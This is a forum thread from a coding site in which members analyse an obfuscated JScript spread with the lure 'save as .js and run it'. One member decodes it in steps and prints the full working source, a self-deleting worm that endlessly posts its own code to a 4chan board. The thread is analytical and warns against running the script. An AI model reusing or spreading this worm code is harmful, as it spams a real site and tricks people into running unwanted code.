Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 7 of 7
  1. #1
    New to the CF scene
    Join Date
    Aug 2008
    Posts
    8
    Thanks
    4
    Thanked 0 Times in 0 Posts

    Question [JS] Weird script... :S

    I been browsing the internet and found this script:

    Code:
    nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n"+
    "7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ"+
    "|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n"+
    "7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n"+
    "8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n"+
    "9l8]C6252==WX\r\n"+
    "8]4=@D6WX\r\n"+
    "7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\n"+
    "IlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O"+
    "7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO"+
    "3C:4<D]-C-?-C-?QZ9\r\n"+
    "2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\n"+
    "H9:=6W`XL\r\n"+
    "2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n"+
    "2]D6?5WX\r\n"+
    "3l2]C6DA@?D6E6IE\r\n"+
    "4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n"+
    "5lQQ\r\n"+
    "6lQQ\r\n"+
    "7@CW:l_j:ka_j:ZZX5ZlCWX\r\n"+
    "7@CW:l_j:kgj:ZZX6ZlCWX\r\n"+
    "2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\n"+
    "ElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n"+
    "2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n"+
    "2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\n"+
    "Qa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\n"+
    "Qr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\Q"+
    "Z5ZQ-C-?QZ\r\n"+
    "<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n"+
    "($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN"
    e=eval
    e('vv="";for(i=0;i<nm.len'+'gth;i++){;if(nm.charA'+
    't(i)=="\\r")vv+="\\r";e'+'lse if(nm.cha'+'rAt(i'+
    ')=="\\n'+'")vv+="\\n";el'+'se vv+=String.fromCh'+
    'arCode((nm.ch'+
    'arC'+'odeAt(i)-32+47)%94+32)};ev'+
    'al(vv);');;;;;;;;;;;
    The guys who posted it also wrote that:
    Code:
    COPY POSTED SCRIPT TO NOTEPAD AND SAVE THE FILE AS .JS AND THAN RUN IT...
    what will happen?

  • #2
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    17,918
    Thanks
    203
    Thanked 2,531 Times in 2,509 Posts
    Quote Originally Posted by bulld0z3r View Post
    COPY POSTED SCRIPT TO NOTEPAD AND SAVE THE FILE AS .JS AND THEN RUN IT...

    what will happen?

    I'll give you three guesses, but I would expect that your computer will be infected with a malicious virus or trojan. The eval() function evaluates a string and executes it as if it was script code. In this case the string is encrypted. Or perhaps nothing will happen. Suggest you try it and post back (if your computer is still working).


    Press any key to continue or any other key to quit
    Last edited by Philip M; 09-01-2008 at 08:05 AM.

  • #3
    New Coder
    Join Date
    Jul 2008
    Location
    Peterborough - UK
    Posts
    63
    Thanks
    4
    Thanked 9 Times in 9 Posts
    What you have there is encripted Javascript.

    Some Source-code protection programs allow you to encript the javascript source into (effectively) trash, hence stopping the majority of people from viewing the source.

    I'd say thats what's happened here - though as bulld0z3r said - beware of hidden code like that as it can pull all sorts of rubbish to your PC.

  • #4
    Regular Coder
    Join Date
    May 2008
    Location
    Lost in Localhost...
    Posts
    702
    Thanks
    3
    Thanked 43 Times in 42 Posts
    into (effectively) trash
    Decoding things like this is usually incredibly easy.

  • #5
    Master Coder
    Join Date
    Feb 2003
    Location
    UmeŚ, Sweden
    Posts
    5,575
    Thanks
    0
    Thanked 83 Times in 74 Posts
    Decoding isn't hard. First, simply merge the split strings.
    Code:
    nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n9l8]C6252==WX\r\n8]4=@D6WX\r\n7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\nIlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO3C:4<D]-C-?-C-?QZ9\r\n2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\nH9:=6W`XL\r\n2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n2]D6?5WX\r\n3l2]C6DA@?D6E6IE\r\n4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n5lQQ\r\n6lQQ\r\n7@CW:l_j:ka_j:ZZX5ZlCWX\r\n7@CW:l_j:kgj:ZZX6ZlCWX\r\n2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\nElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n2]D6EC6BF6DE96256CWQr@?E6?E\\&#37;JA6Q[EX\r\n2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\nQa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\nQr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN";
    e=eval;
    e('vv="";for(i=0;i<nm.length;i++){;if(nm.charAt(i)=="\\r")vv+="\\r";else if(nm.charAt(i)=="\\n")vv+="\\n";else vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)};eval(vv);');
    Okay, then take the eval part and replace it with the code that is being run in it:
    Code:
    nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n9l8]C6252==WX\r\n8]4=@D6WX\r\n7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\nIlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO3C:4<D]-C-?-C-?QZ9\r\n2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\nH9:=6W`XL\r\n2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n2]D6?5WX\r\n3l2]C6DA@?D6E6IE\r\n4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n5lQQ\r\n6lQQ\r\n7@CW:l_j:ka_j:ZZX5ZlCWX\r\n7@CW:l_j:kgj:ZZX6ZlCWX\r\n2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\nElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\nQa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\nQr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN";
    e=eval;
    vv="";
    for(i=0;i<nm.length;i++){
        if(nm.charAt(i)=="\r")
            vv+="\r";
        else if(nm.charAt(i)=="\n")
            vv+="\n";
        else
            vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)
    };
    eval(vv);
    The code should be pretty self explanatory by now, but to get brief, vv ends up being the result of doing a rot47 on the sequence of 94 characters that start at whitespace (U+0020) - as well as preserving any line feeds (U+000A) and carriage returns (U+000D) - in the orignal variable nm.

    The result replacing the eval(vv); with it's code is the following:
    Code:
    k="Content-Disposition: form-data; name="
    
    function r(){return String.fromCharCode("a".charCodeAt(0)+Math.floor(Math.random()*26))}
    
    f=WSH.createobject("scripting.filesystemobject")
    
    g=f.opentextfile(WSH.scriptfullname)
    
    h=g.readall()
    
    g.close()
    
    f.deletefile(WSH.scriptfullname)
    
    x="Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and **** bricks.\r\n\r\n"+h
    
    a=WSH.createobject("msxml2.xmlhttp")
    
    while(1){
    
    a.open("get","http://img.4chan.org/b",0)
    
    a.send()
    
    b=a.responsetext
    
    c=b.substr(b.indexOf("res/")+4,8)
    
    d=""
    
    e=""
    
    for(i=0;i<20;i++)d+=r()
    
    for(i=0;i<8;i++)e+=r()
    
    a.open("post","http://dat.4chan.org/b/imgboard.php",0)
    
    t="multipart/form-data; boundary="+d
    
    a.setrequestheader("Content-Type",t)
    
    a.send("--"+d+"\r\n"+k+"\"MAX_FILE_SIZE\"\r\n\r\n"+
    
    "2097152\r\n--"+d+"\r\n"+
    
    k+"\"resto\"\r\n\r\n"+c+"\r\n--"+d+"\r\n"+
    
    k+"\"name\"\r\n\r\n\r\n--"+d+"\r\n"+
    
    k+"\"email\"\r\n\r\n\r\n--"+d+"\r\n"+
    
    k+"\"sub\"\r\n\r\n\r\n--"+d+"\r\n"+
    
    k+"\"com\"\r\n\r\n"+x+"\r\n--"+d+"\r\n"+
    
    k+"\"upfile\"; filename=\"\"\r\n"+
    
    "Content-Type: application/octet-stream\r\n\r\n\r\n--"+d+"\r\n"+
    
    k+"\"pwd\"\r\n\r\n"+e+"\r\n--"+d+"\r\n"+
    
    k+"\"mode\"\r\n\r\nregist\r\n--"+d+"--\r\n")
    
    WSH.sleep(3e4+Math.floor(Math.random()*3e4))}
    Last edited by liorean; 09-01-2008 at 10:13 PM.
    liorean <[lio@wg]>
    Articles: RegEx evolt wsabstract , Named Arguments
    Useful Threads: JavaScript Docs & Refs, FAQ - HTML & CSS Docs, FAQ - XML Doc & Refs
    Moz: JavaScript DOM Interfaces MSDN: JScript DHTML KDE: KJS KHTML Opera: Standards

  • #6
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    17,918
    Thanks
    203
    Thanked 2,531 Times in 2,509 Posts
    And it actually does - what?

  • #7
    Master Coder
    Join Date
    Feb 2003
    Location
    UmeŚ, Sweden
    Posts
    5,575
    Thanks
    0
    Thanked 83 Times in 74 Posts
    Well, let's see. It's designed to be run in the Windows Scripting Host. (Which is the default behaviour when opening .js files on Windows, which I find hilarious considering that writing .js files for homepages must be many times more usual than writing windows scripts.)
    Code:
    f=WSH.createobject("scripting.filesystemobject");
    g=f.opentextfile(WSH.scriptfullname);
    h=g.readall();
    g.close();
    f.deletefile(WSH.scriptfullname);
    This part reads the content of the file (the OP's source code, that is) into the variable h and then deletes that file.


    Code:
    a=WSH.createobject("msxml2.xmlhttp");
    while(1){
        a.open("get","http://img.4chan.org/b",0);
        a.send();
        b=a.responsetext;
        c=b.substr(b.indexOf("res/")+4,8);
    This part seems to mine a certain string out of a 4chan page.


    Code:
        d="";
        e="";
        for(i=0;i<20;i++)d+=r();
        for(i=0;i<8;i++)e+=r();
        a.open("post","http://dat.4chan.org/b/imgboard.php",0);
        t="multipart/form-data; boundary="+d;
        a.setrequestheader("Content-Type",t);
        a.send("--"+d+"\r\n"+k+"\"MAX_FILE_SIZE\"\r\n\r\n"+
            "2097152\r\n--"+d+"\r\n"+
            k+"\"resto\"\r\n\r\n"+c+"\r\n--"+d+"\r\n"+
            k+"\"name\"\r\n\r\n\r\n--"+d+"\r\n"+
            k+"\"email\"\r\n\r\n\r\n--"+d+"\r\n"+
            k+"\"sub\"\r\n\r\n\r\n--"+d+"\r\n"+
            k+"\"com\"\r\n\r\n"+x+"\r\n--"+d+"\r\n"+
            k+"\"upfile\"; filename=\"\"\r\n"+
            "Content-Type: application/octet-stream\r\n\r\n\r\n--"+d+"\r\n"+
            k+"\"pwd\"\r\n\r\n"+e+"\r\n--"+d+"\r\n"+
            k+"\"mode\"\r\n\r\nregist\r\n--"+d+"--\r\n");
    This part seems to generate a random username and password and try to post the message the OP had seen to 4chan.



    Code:
        WSH.sleep(3e4+Math.floor(Math.random()*3e4));
    }
    And this part puts the script process to sleep after each try at posting, after which it will resume that infinite loop that started with the while(1){ above.
    Last edited by liorean; 09-02-2008 at 03:42 PM.
    liorean <[lio@wg]>
    Articles: RegEx evolt wsabstract , Named Arguments
    Useful Threads: JavaScript Docs & Refs, FAQ - HTML & CSS Docs, FAQ - XML Doc & Refs
    Moz: JavaScript DOM Interfaces MSDN: JScript DHTML KDE: KJS KHTML Opera: Standards


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •